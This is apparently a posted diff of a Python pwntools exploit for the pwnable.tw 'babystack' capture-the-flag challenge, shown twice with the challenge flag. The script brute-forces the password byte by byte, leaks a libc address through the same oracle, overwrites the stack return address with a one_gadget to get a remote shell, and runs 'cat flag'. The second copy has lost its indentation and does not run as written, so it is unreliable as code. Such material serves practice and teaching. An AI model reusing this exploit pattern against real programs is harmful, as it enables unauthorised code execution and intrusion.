H4niz · December 24, 2018 14:56
diff --git a/bbst.py b/bbst.py
 #!/usr/bin/env python


 from pwn import *

 __DEBUG__ = 0
 __FILE__ = "./babystack"
 ELF(__FILE__)
 __BIN__ = ""
 __HOST__ = "chall.pwnable.tw"
 __PORT__ = 10205


 __DEBUG__ = int(raw_input("__DEBUG__\n> "))

 if __DEBUG__:
 	io = process(__FILE__)
 	__LIBC__ = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
 	one_gadget = 0xf1147

 else:
 	io = remote(__HOST__, __PORT__)
 	__LIBC__ = ELF("libc_64.so.6")
 	one_gadget = 0xf0567

 # context.log_level='debug'
 # 
 magic_copy = 0x24


 def login(p, endline=True):
 	io.recvuntil(">>")
 	io.send("1")

 	io.recvuntil(":")
 	if endline:
 		io.sendline( str(p) )
 	else:
 		io.send( str(p)) 

 def magic(p):
 	io.recvuntil(">>")
 	io.send("3")

 	return io.send( str(p) )

 def brutepass(passwd='', l=0x10, begin=1):
 	count = 1
 	# passwd = ""
 	while( count <= l ):
 		for i in xrange(begin, 0x100):
 			print count
 			login( passwd+chr(i))
 			res = io.recvuntil("!")
 			if "Success" in res:
 				passwd += chr(i)
 				print "Passwd: %s"%passwd
 				count +=1
 				io.sendline("1")
 				break

 	return passwd


 passwd = brutepass()
 print "[+] Passwd found: " + repr(passwd)
 print "[+] Len: ", len(passwd)

 pwd = passwd
 pwd += "1"*8
 pwd += "2"*8
 pwd += "3"*8

 log = passwd.ljust(0x40, "P")
 log += "R"*8

 pwd = "R"*8

 breakpoints = """
 				brva 0xEBB
 				brva 0xF87
 			"""


 login(log, endline=False)
 login("\x00")

 magic("M"*0x3f)
 io.recvuntil("copy !")
 io.sendline('1')

 if __DEBUG__:
 	gdb.attach(io)


 libc = ''
 count = 0
 while( count < 6):
 	for j in range(0x1, 0x100):
 		login( pwd + chr(j) )
 		res = io.recvuntil("!")
 		if "Success" in res:
 			libc += chr(j)
 			pwd += chr(j)
 			io.sendline("1")
 			count += 1
 			break


 libcbase = u64(libc.ljust(8, "\x00")) - __LIBC__.symbols['_IO_file_setbuf'] - 9
 ret = libcbase + one_gadget

 print "[-] libcbase: %#x"%libcbase
 print "[-] ret: %#x"%ret

 log = passwd.ljust(0x40, "P")
 log += passwd
 log += p64(0x3131313131313131)
 log += "B"*16
 log += p64(ret)

 login(log, endline=False)
 login("\x00")
 magic("M"*0x3f)


 io.recvuntil("copy !")
 io.sendline("2") #triggeru
 io.sendline("cat flag")
 io.interactive() 

 #FLAG{Its_juS7_a_st4ck0v3rfl0w}
	#!/usr/bin/env python


	from pwn import *

	__DEBUG__ = 0
	__FILE__ = "./babystack"
	ELF(__FILE__)
	__BIN__ = ""
	__HOST__ = "chall.pwnable.tw"
	__PORT__ = 10205


	__DEBUG__ = int(raw_input("__DEBUG__\n> "))

	if __DEBUG__:
	io = process(__FILE__)
	__LIBC__ = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
	one_gadget = 0xf1147

	else:
	io = remote(__HOST__, __PORT__)
	__LIBC__ = ELF("libc_64.so.6")
	one_gadget = 0xf0567

	# context.log_level='debug'
	#
	magic_copy = 0x24


	def login(p, endline=True):
	io.recvuntil(">>")
	io.send("1")

	io.recvuntil(":")
	if endline:
	io.sendline( str(p) )
	else:
	io.send( str(p))

	def magic(p):
	io.recvuntil(">>")
	io.send("3")

	return io.send( str(p) )

	def brutepass(passwd='', l=0x10, begin=1):
	count = 1
	# passwd = ""
	while( count <= l ):
	for i in xrange(begin, 0x100):
	print count
	login( passwd+chr(i))
	res = io.recvuntil("!")
	if "Success" in res:
	passwd += chr(i)
	print "Passwd: %s"%passwd
	count +=1
	io.sendline("1")
	break

	return passwd


	passwd = brutepass()
	print "[+] Passwd found: " + repr(passwd)
	print "[+] Len: ", len(passwd)

	pwd = passwd
	pwd += "1"*8
	pwd += "2"*8
	pwd += "3"*8

	log = passwd.ljust(0x40, "P")
	log += "R"*8

	pwd = "R"*8

	breakpoints = """
	brva 0xEBB
	brva 0xF87
	"""


	login(log, endline=False)
	login("\x00")

	magic("M"*0x3f)
	io.recvuntil("copy !")
	io.sendline('1')

	if __DEBUG__:
	gdb.attach(io)


	libc = ''
	count = 0
	while( count < 6):
	for j in range(0x1, 0x100):
	login( pwd + chr(j) )
	res = io.recvuntil("!")
	if "Success" in res:
	libc += chr(j)
	pwd += chr(j)
	io.sendline("1")
	count += 1
	break


	libcbase = u64(libc.ljust(8, "\x00")) - __LIBC__.symbols['_IO_file_setbuf'] - 9
	ret = libcbase + one_gadget

	print "[-] libcbase: %#x"%libcbase
	print "[-] ret: %#x"%ret

	log = passwd.ljust(0x40, "P")
	log += passwd
	log += p64(0x3131313131313131)
	log += "B"*16
	log += p64(ret)

	login(log, endline=False)
	login("\x00")
	magic("M"*0x3f)


	io.recvuntil("copy !")
	io.sendline("2") #triggeru
	io.sendline("cat flag")
	io.interactive()

	#FLAG{Its_juS7_a_st4ck0v3rfl0w}